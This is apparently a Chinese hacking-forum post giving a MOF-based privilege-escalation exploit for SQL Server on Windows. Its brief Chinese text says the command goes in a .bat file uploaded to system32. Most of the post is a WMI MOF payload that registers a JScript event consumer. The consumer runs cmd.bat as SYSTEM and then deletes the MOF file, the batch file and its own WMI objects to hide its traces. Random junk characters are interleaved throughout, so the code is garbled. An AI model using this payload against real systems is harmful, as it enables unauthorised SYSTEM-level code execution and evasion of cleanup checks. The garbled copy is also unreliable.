这个sql提权MOF需要运行 system下的文件,不能定义路径。' J0 u K% }4 P
需要将要运行的命令写入到bat上传到system32目录,然后执行。4 r1 c) O6 p; m1 U* P
, `7 U: ~8 a0 |4 ^这个sql提权MOF需要运行 system下的文件,不能定义路径。
5 q/ A5 W- O: ^9 g* j* q需要将要运行的命令写入到bat上传到system32目录,然后执行。8 a1 F3 h1 g4 X8 u) H) w/ c. P N
* \& o; _* W& k+ ~* c
#pragma
N+ S) ^ L) R1 B2 @, H namespace("\\\\.\\root\\cimv2")
2 h6 i" z: M9 ?4 ^ D class
# _2 ~1 M$ x) N t( y$ k5 p MyClass547
, z0 r* j3 w; `/ M { [key]8 ^" [5 W4 a. h/ `" e
string w% |5 y0 A/ G2 d( B
Name;
3 z( Q! K1 P) ?( O };
9 l3 F v3 ?- ]/ i8 ? class$ {9 `& A1 ^, B2 z1 P
ActiveScriptEventConsumer
z& ]' {1 z3 h& P1 X" h : __EventConsumer { [key]
+ n, J6 R @0 E5 \ string
% y5 X. u# ]; \0 a. T1 d& N# ^$ e Name; [not_null]4 p" }) A9 }' C- v1 Y' B2 I6 T, r
string
+ {7 M* @* g% E @# k ScriptingEngine; string
y2 n- l! k, p; s6 k6 a' ^4 n! R ScriptFileName; [template]
; w7 j8 R/ x7 p- Q y# v9 d) k K string
$ H' B% @/ ?' U0 [) g8 ` ScriptText; uint32 KillTimeout;
" ]/ ]' m( q. E8 w; O }; instance of __Win32Provider as $P {0 V( k4 H+ w* S2 n8 }
Name0 _2 N( k8 F* ]2 j$ v. ~* B, _" P
=9 c& n2 G1 @- n( B8 n
"ActiveScriptEventConsumer"; CLSID =1 z6 @( t" R4 O1 U3 W# E) C
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
7 l* I9 L; v4 }5 [$ u* i( g4 a; e2 A% y0 g PerUserInitialization
1 y4 x8 x" i* c/ j2 a5 ]# _! e! n = TRUE;( c! M% L& b+ q" h0 B8 `
}; instance of __EventConsumerProviderRegistration { Provider- {/ t9 }# D! b8 t' s" l9 r
= $P; ConsumerClassNames3 y+ s* n O {$ H, L) P
=/ V) a" p0 | d9 @9 @
{"ActiveScriptEventConsumer"}; }9 y: L% R3 n5 J: w
};
, ~* I# X, J" t3 U1 e" O: c Instance of ActiveScriptEventConsumer% k" U G G4 p: A, [, r
as $cons { Name3 w1 _, Q5 z# c+ r" ^8 D. v7 T: f
=
9 ^) H* H5 i; d "ASEC"; ScriptingEngine1 E P5 i; `2 Y! }
=( K( r$ t' C+ R) B
"JScript"; ScriptText, c# a$ N$ ~: |4 E" j5 k
=( l% K/ H' r% Z; J. h+ w, Q& k
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
a& K& g; p; w A2 Q Instance of ActiveScriptEventConsumer
( Q8 O" _, ~4 O; O1 ]* O as $cons2 { Name
1 M9 y5 ?# [, m =' r2 P; L/ j) ]6 x3 |
"qndASEC"; ScriptingEngine
1 S0 W* N8 h- S s =3 S1 ] f* f/ k# U$ i
"JScript"; ScriptText/ D8 d( y4 k6 r8 V& l
=
9 {7 ?, S9 C" d+ v/ ^# J; W# g9 ~ "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
* X6 N3 c1 ^; A }; instance of __EventFilter as $Filt { Name# ~) @ L+ i; k. H
=
6 @3 |% X' M2 ?3 x, M2 v/ J9 y "instfilt"; Query; C5 N0 L% [% Y8 O9 O$ p: f- `! h0 H
=' I, C% {/ g% i0 d& _( F
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage2 T0 _$ a+ q* }: p' D
=
4 |) g- Z/ v( \1 @- y# { "WQL"; }; instance of __EventFilter as $Filt2 { Name* m1 M+ N O) f: e5 u; Q1 V5 J
=
0 @# x' I1 h7 |& j- d. q "qndfilt"; Query
9 z0 N R+ w4 w2 o$ k) a3 o =
) N0 a' g4 h! W4 c "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage t. d+ W4 M% b' ~# l: w- N
=/ W1 e: w( Q( A# l
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
{9 d5 {: w# k6 W0 p2 T U; l4 m = $cons; Filter
4 T+ _ q x5 X d! j = $Filt;
/ _% G$ `5 P0 f- N8 {$ N% D& J0 v }; instance of __FilterToConsumerBinding as $bind2 { Consumer' ~9 e6 f4 m* E% t$ m9 A
= $cons2; Filter: t$ g( ~: h6 S! o$ \, U% v) g
= $Filt2;
* q$ v- k; u2 V" X' X }; instance of MyClass547
7 d) m; _1 `$ T7 @+ P4 u m) k Q: V as $MyClass { Name
# f ]' h1 u5 B( u& k =+ G* w. |0 K1 Y. }- l2 i. A
"ClassConsumer"; z" ]$ ?4 a/ M) E4 e
}; |